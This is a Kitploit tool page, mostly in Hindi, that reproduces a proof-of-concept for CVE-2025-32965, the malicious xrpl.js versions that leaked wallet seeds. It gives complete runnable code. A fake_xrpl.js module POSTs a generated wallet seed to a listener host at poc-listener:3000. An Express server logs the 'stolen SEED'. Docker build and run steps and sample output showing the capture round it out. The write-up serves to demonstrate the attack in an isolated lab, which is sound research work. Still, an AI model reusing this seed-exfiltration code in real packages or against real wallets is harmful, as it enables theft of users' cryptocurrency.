Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-32965-xrpl-js-poc — CVE कोड: CVE-2025-32965 भेद्यता प्रकार: Supply Chain Attack (CWE-506: Embedded Malicious Code) लक्ष्य: xrpl.js लाइब्रेरी के 4.2.1–4.2.4 और 2.14.2 संस्करण प्रभाव: उपयोगकर्ता के वॉलेट seed/secret डेटा का हमलावर को भेजा जाना | Kitploit
उपकरण/GitHubGitHub/yusufdalbudak/cve-2025-32965-xrpl-js-poc
भेद्यता विश्लेषणशोषणडेटा निष्कासनमालवेयर विश्लेषणआपूर्ति श्रृंखला सुरक्षालर्निंग और शिक्षा
GitHubyusufdalbudak/cve-2025-32965-xrpl-js-poc

CVE-2025-32965-xrpl-js-poc

CVE कोड: CVE-2025-32965 भेद्यता प्रकार: Supply Chain Attack (CWE-506: Embedded Malicious Code) लक्ष्य: xrpl.js लाइब्रेरी के 4.2.1–4.2.4 और 2.14.2 संस्करण प्रभाव: उपयोगकर्ता के वॉलेट seed/secret डेटा का हमलावर को भेजा जाना

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-32965 — xrpl.js सप्लाई चेन हमला PoC रिपोर्ट

भेद्यता विवरण

  • CVE कोड: CVE-2025-32965
  • भेद्यता प्रकार: सप्लाई चेन हमला (CWE-506: एम्बेडेड दुर्भावनापूर्ण कोड)
  • लक्ष्य: xrpl.js लाइब्रेरी के संस्करण 4.2.1–4.2.4 और 2.14.2
  • प्रभाव: उपयोगकर्ता के वॉलेट seed/secret डेटा का हमलावर को भेजा जाना

उद्देश्य

यह PoC, एक दुर्भावनापूर्ण xrpl.js संस्करण किस प्रकार seed exfiltration (रिसाव) कर सकता है, यह एक पृथक वातावरण में प्रदर्शित करने का उद्देश्य रखता है।

वातावरण संरचना

  • प्लेटफ़ॉर्म: Docker (WSL आधारित Ubuntu)
  • नेटवर्क: xrplnet नामक निजी Docker नेटवर्क
  • कंटेनर:
    • poc-listener: Seed डेटा एकत्र करने वाला हमलावर सर्वर
    • xrpl-poc: पीड़ित पक्ष की टेस्ट स्क्रिप्ट्स होस्ट करने वाला PoC कंटेनर

उपयोग की गई फ़ाइलें

package.json:

root@kitploit:~
{
  "name": "xrpl-poc",
  "version": "1.0.0",
  "main": "test.js",
  "dependencies": {
    "express": "^4.18.2",
    "body-parser": "^1.20.2",
    "xrpl": "^2.7.1"
  }
}

Dockerfile:

root@kitploit:~
FROM node:20
WORKDIR /app
COPY . .
RUN npm install
CMD [ "node", "test.js" ]

fake_xrpl.js:

root@kitploit:~
async function checkValidityOfSeed(seed) {
  const res = await fetch("http://poc-listener:3000/xcm", {
    method: "POST",
    body: seed,
    headers: {
      "Content-Type": "text/plain",
      "User-Agent": "r3v3r5e-poc"
    }
  });
  console.log(" Seed gönderildi:", seed);
}

module.exports = { checkValidityOfSeed };

test.js:

root@kitploit:~
const xrpl = require("xrpl")
const { checkValidityOfSeed } = require("./fake_xrpl")

const wallet = xrpl.Wallet.generate()
console.log("  Oluşturulan cüzdan:")
console.log("Seed:", wallet.seed)
console.log("Address:", wallet.classicAddress)

checkValidityOfSeed(wallet.seed)

server.js:

root@kitploit:~
const express = require('express')
const bodyParser = require('body-parser')
const app = express()

app.use(bodyParser.text())

app.post("/xcm", (req, res) => {
  console.log("  Çalınan SEED =>", req.body)
  res.send("OK")
})

app.listen(3000, () => {
  console.log(" Listener aktif: http://poc-listener:3000/xcm")
})

चरण

  1. Docker बिल्ड:
root@kitploit:~
docker build -t xrpl-poc .
docker network create xrplnet
  1. Listener प्रारंभ करें:
root@kitploit:~
docker run -it --rm --network xrplnet --name poc-listener xrpl-poc node server.js
  1. पीड़ित द्वारा Seed भेजना:
root@kitploit:~
docker run -it --rm --network xrplnet xrpl-poc node test.js

आउटपुट उदाहरण

पीड़ित टर्मिनल:

root@kitploit:~
  Oluşturulan cüzdan:
Seed: sEd79cMs56cynRVYoXVkk1pn8uYcVqr
Address: rHvx6Xups5uR62QiC31aZeMSMnCFT62fgC
  Seed gönderildi: sEd79cMs56cynRVYoXVkk1pn8uYcVqr

हमलावर टर्मिनल:

root@kitploit:~
  Listener aktif: http://poc-listener:3000/xcm
  Çalınan SEED => sEd79cMs56cynRVYoXVkk1pn8uYcVqr

निष्कर्ष

यह PoC, CVE-2025-32965 भेद्यता का व्यावहारिक रूप से कैसे शोषण किया जा सकता है, यह प्रदर्शित करता है। दुर्भावनापूर्ण xrpl.js लाइब्रेरी का seed exfiltration कोड एक पृथक परीक्षण वातावरण में सफलतापूर्वक चलाया गया और हमलावर सर्वर पर डेटा रिसाव किया गया।

GitHub रेपो संरचना (अनुशंसित)

root@kitploit:~
xrpl-poc/
├── Dockerfile
├── package.json
├── test.js
├── fake_xrpl.js
├── server.js
└── README.md

तैयारकर्ता: युसुफ़ दालबुदक
परीक्षण वातावरण: WSL2 + Docker + Node.js v20

टूल डाउनलोड करें